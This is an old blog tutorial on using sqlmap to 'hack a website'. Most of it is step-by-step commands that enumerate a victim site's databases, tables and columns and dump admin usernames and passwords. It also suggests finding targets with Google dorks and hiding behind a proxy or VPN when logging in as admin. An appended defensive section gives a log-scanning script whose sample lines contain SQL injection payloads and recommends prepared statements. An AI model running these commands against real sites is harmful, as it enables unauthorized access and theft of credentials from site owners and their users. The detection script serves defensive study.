Thursday, January 8, 2015

SQL Injection Using SqlMap (Backtrack 5 R3)

Sqlmap is an automated pen testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over databases. It comes with a powerful detection engine, many niche features for the ultimate pen tester, and a broad range of switches, from database fingerprinting to fetching data from the database. The tool is well suited to beginners who have just entered the security field. It is easy to use and makes SQL injection easy compared to manual SQL injection.
Follow these simple steps to hack a website using the sqlmap tool in BackTrack 5.

1. Open your BackTrack terminal, type cd /pentest/database/sqlmap and hit Enter. You are now in the sqlmap directory.




2. Now find the vulnerable site. (Well, I already have a vulnerable site.) You can search for vulnerable sites using Dorks. Google it!

3. Now type this command in the terminal and hit enter.
python sqlmap.py -u http://yourvictim’slink/index.php?id=4 --dbs

4. Now you will get the database names of the website.




Well, I got two databases, aj and information_schema. We will select the aj database.
5. Now get the tables of that database. To do that, enter this command into your terminal and hit Enter.
python sqlmap.py -u http://yourvictim’slink/index.php?id=4 -D  (database name) --tables
6. Now we need to grab the tables from the aj database. Paste the command below and hit Enter.
python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -D aj --tables

7. Now you will get the list of tables stored in the aj database.




8. Now let's grab the columns from the admin table.
python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -T admin --columns

Now we have the columns, and we got username and password.
9. Now let's grab the passwords of the admin.
python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -T admin -U test --dump
Now we have the username and the password of the website!


Now just find the admin panel of the website, and use a proxy/VPN when you are trying to log in to the website as an admin.
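
From the defending side, the requests that steps 3 to 9 generate show up in the web server's access log. The following Python script is an added example, not part of the original post: it flags clients that send sqlmap's default User-Agent or a non-numeric value in the id parameter. The log lines, the Apache combined log format and the function names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from the original post).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jan/2015:10:00:01 +0000] "GET /index.php?id=4 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [08/Jan/2015:10:00:05 +0000] "GET /index.php?id=4%20AND%205141%3D5141 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.9 - - [08/Jan/2015:10:00:06 +0000] "GET /index.php?id=4%27 HTTP/1.1" 500 87 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.44 - - [08/Jan/2015:10:02:11 +0000] "GET /index.php?id=4%20UNION%20ALL%20SELECT%20NULL--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.7 - - [08/Jan/2015:10:03:00 +0000] "GET /about.php HTTP/1.1" 200 300 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# client, ident, user, [time], "method target proto", status, size, "referer", "agent"
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')


def classify(line, numeric_params=("id",)):
    """Return (client_ip, reasons); reasons is empty when nothing looks wrong."""
    m = LINE.match(line)
    if not m:
        return None, []
    ip, _method, target, _status, agent = m.groups()
    reasons = []
    # sqlmap identifies itself in the User-Agent header unless told otherwise.
    if agent.lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    # parse_qs percent-decodes, so encoded quotes and spaces become visible.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name in numeric_params:
        for value in query.get(name, []):
            if not re.fullmatch(r"[0-9]+", value):
                reasons.append(f"non-numeric-{name}")
    return ip, reasons


def suspects(log_text):
    """Map each flagged client IP to the sorted set of reasons seen for it."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        ip, reasons = classify(line)
        if reasons:
            hits[ip].update(reasons)
    return {ip: sorted(found) for ip, found in hits.items()}


if __name__ == "__main__":
    for ip, found in suspects(SAMPLE_LOG).items():
        print(ip, ", ".join(found))
```

The User-Agent header is client-controlled, so the non-numeric id check is the more reliable of the two signals. The underlying fix is to bind id as a parameter in a prepared statement, so the value is never parsed as SQL.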
